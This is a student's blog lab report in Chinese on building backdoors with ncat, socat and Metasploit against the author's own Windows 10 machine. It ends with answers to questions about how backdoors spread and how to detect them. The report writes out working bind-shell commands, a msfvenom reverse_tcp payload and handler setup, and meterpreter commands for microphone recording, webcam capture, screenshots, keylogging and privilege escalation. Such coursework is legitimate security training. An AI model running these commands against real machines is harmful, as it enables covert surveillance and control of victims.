Exp2 后门原理与实践

20155332《网络对抗》Exp2 后门原理与实践

1.实验环境

  • 主机一台联想台式机,安装有win10系统 。
  • 安装的kali虚拟机为攻击机。
  • 我的win10系统作为靶机。(建议再安装一个虚拟机作为靶机,不要像我这么做。我电脑有点卡,就没有安装那么多虚拟机了)
  • win10系统里,需要安装好ncat工具和socat工具,下载地址见老师的码云。
  • win10的IP是172.16.2.29,kali虚拟机的IP是192.168.114.129.

2.实验内容 (3.5分)

  • (1)使用netcat获取主机操作Shell,cron启动 (0.5分)
  • (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)
  • (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
  • (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
  • (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

3.实验步骤

3.1使用netcat获取主机操作Shell,cron启动

1.在win10的cmd里,进入D:\ncat\ncat,输入ncat -l -e cmd.exe -p 53

2.在kali的终端里,输入nc 172.16.2.29 53连接win10,获得shell权限

3.2使用socat获取主机操作Shell, 任务计划启动

1.在win10靶机中点击控制面板->系统和安全->管理工具->任务计划程序,话不多说,上图。

在操作选项卡中绑定socat程序,给出参数 tcp-listen:5332exec:cmd.exe,pty,stderr

右键5332进程,然后启动就行。

2.在kali虚拟机中,socat - tcp:172.16.2.29:5332
,就可以获得win10的shell权限了

3.3使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在kali虚拟机中用Meterpreter生成后门。
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.29 LPORT=5332 -f exe > backdoor.exe

2.把这个后门用ncat传送到靶机上。
kali:ncat -l 5332 < backdoor.exe
nc 172.16.2.29 > backdoor.exe

3.开启后门

  • 在kali虚拟机终端输入 msfconsole

  • 接着输入 use exploit/multi/handler
  • 输入set payload windows/meterpreter/reverse_tcp

  • set LHOST 172.16.2.29
  • set LPORT 5332
  • show options
  • exploit

4.开始窃取个人隐私

  • 输入shell,获得windows 命令行

3.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 输入record_mic获取音频

  • webcam_snap打开摄像头

  • screenshot截屏

  • keyscan_start开始键盘记录
  • keyscan_dump导出键盘记录

5.尝试提权
输入getsystem提权,但是失败了。

4.基础问题回答

  • (1)例举你能想到的一个后门进入到你系统中的可能方式?

答:太多了。作为《机要风云》的演员之一,我饰演的机要员小刘的电脑就被黑客植入过后门。

捆绑软件可以把后门和应用软件捆绑在一起,让我下载,进入我的系统。

浏览网页的时候,一些弹窗会自动下载恶意软件。

用一些破解软件,比如我的office就是用小马KMS激活的,可能就在电脑留下了后门。

有人趁我不注意用U盘拷到我的电脑里。

  • (2)例举你知道的后门如何启动起来(win及linux)的方式?

伪装成正规软件,双击就可以启动。

或者设置为开机自启动。

  • (3)Meterpreter有哪些给你映像深刻的功能?

可以打开电脑的摄像头,可以直播。去年参加微视演绎的时候,学姐给我电脑里植入的后门,打开了我的摄像头,我感到震惊。毕竟自己笔记本电脑的摄像头从来没用过,然后就被别人控制了,太可怕了。现在我终于知道了这个其实并不难。

  • (4)如何发现自己有系统有没有被安装后门?

用windows defender对电脑进行实时防护。

做实验的时候我只有把他关了才能运行这个后门程序。一打开Windows defender就会提醒电脑有恶意病毒,然后就把它删了。

所以,自带的杀毒软件还是不错的。

posted @ 2018-03-28 15:52  besti5332  阅读(229)  评论(0编辑  收藏  举报